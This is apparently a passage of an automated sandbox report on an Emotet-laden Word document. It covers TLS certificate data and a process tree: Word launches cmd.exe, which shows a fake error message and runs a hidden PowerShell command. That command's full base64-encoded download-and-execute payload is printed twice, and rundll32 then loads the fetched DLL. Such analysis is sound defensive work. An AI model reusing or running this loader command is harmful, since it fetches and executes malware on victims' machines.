                                                                    Location: https://traumfrauen-ukraine.de/bin/JyeS/
                                                                    Last-Modified: Tue, 26 Jan 2021 05:54:47 GMT
                                                                    X-Powered-By: PleskLin


                                                                    HTTPS Packets

                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                    Jan 26, 2021 06:54:56.514801025 CET104.21.88.166443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESat Aug 01 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Sun Aug 01 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                    Jan 26, 2021 06:54:57.119563103 CET212.227.200.73443192.168.2.2249169CN=*.traumfrauen-ukraine.de CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Mar 19 01:00:00 CET 2020 Mon Nov 27 13:46:10 CET 2017Tue May 18 14:00:00 CEST 2021 Sat Nov 27 13:46:10 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                    CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 27 13:46:10 CET 2017Sat Nov 27 13:46:10 CET 2027
                                                                    Jan 26, 2021 06:54:57.335607052 CET192.0.78.20443192.168.2.2249170CN=*.wpcomstaging.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Sep 29 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Oct 31 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                    CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                    CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029

                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: WINWORD.EXE PID: 1144 Parent PID: 584

                                                                    General

                                                                    Start time:06:54:32
                                                                    Start date:26/01/2021
                                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                    Imagebase:0x13f6c0000
                                                                    File size:1424032 bytes
                                                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: cmd.exe PID: 2372 Parent PID: 1220

                                                                    General

                                                                    Start time:06:54:34
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA==
                                                                    Imagebase:0x4aaa0000
                                                                    File size:345088 bytes
                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: msg.exe PID: 2532 Parent PID: 2372

                                                                    General

                                                                    Start time:06:54:34
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\System32\msg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:msg user /v Word experienced an error trying to open the file.
                                                                    Imagebase:0xff730000
                                                                    File size:26112 bytes
                                                                    MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: powershell.exe PID: 2584 Parent PID: 2372

                                                                    General

                                                                    Start time:06:54:35
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA==
                                                                    Imagebase:0x13f720000
                                                                    File size:473600 bytes
                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2712 Parent PID: 2584

                                                                    General

                                                                    Start time:06:54:40
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                                                                    Imagebase:0xffa20000
                                                                    File size:45568 bytes
                                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2688 Parent PID: 2712

                                                                    General

                                                                    Start time:06:54:40
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2088248938.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2692 Parent PID: 2688

                                                                    General

                                                                    Start time:06:54:41
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2090614258.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2090414213.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 260 Parent PID: 2692

                                                                    General

                                                                    Start time:06:54:42
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
